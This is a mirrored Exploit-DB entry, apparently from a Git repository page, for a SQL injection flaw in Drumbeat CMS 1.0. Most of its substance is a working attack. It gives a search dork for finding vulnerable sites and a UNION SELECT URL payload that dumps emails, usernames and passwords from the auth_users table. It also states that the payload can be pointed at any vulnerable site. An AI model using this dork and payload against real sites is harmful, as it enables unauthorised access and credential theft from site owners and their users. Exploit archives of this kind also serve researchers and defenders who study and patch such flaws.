bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10575.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
720 B
Text
Raw Blame History

# Vendor: http://www.drumbeatcms.com.au/
# Version: Version 1.0
# Tested on: Windows and Linux
-----------------------------------------
Drumbeat CMS SQL Injection Exploit
[+] Discovered and notified by Sora
A SQL injection exploit is found in Drumbeat CMS. The vulnerability exists in where there is an index.php page, such as index02.php?id=5. or index03.php?id=2.
Dork: "Powered by Drumbeat" inurl:index02.php
# Code: http://www.site.com/index02.php?id=-2+UNION+SELECT+ALL+group_concat(email,0x3a,username,0x3a,password)+from+auth_users--
You can usually replace the http://www.site.com/ with any site that is vulnerable to SQL injection.
Greetz: Bw0mp and the rest of the people from Incursio ex Subter!
# EOF #
Reference in a new issue View git blame Copy permalink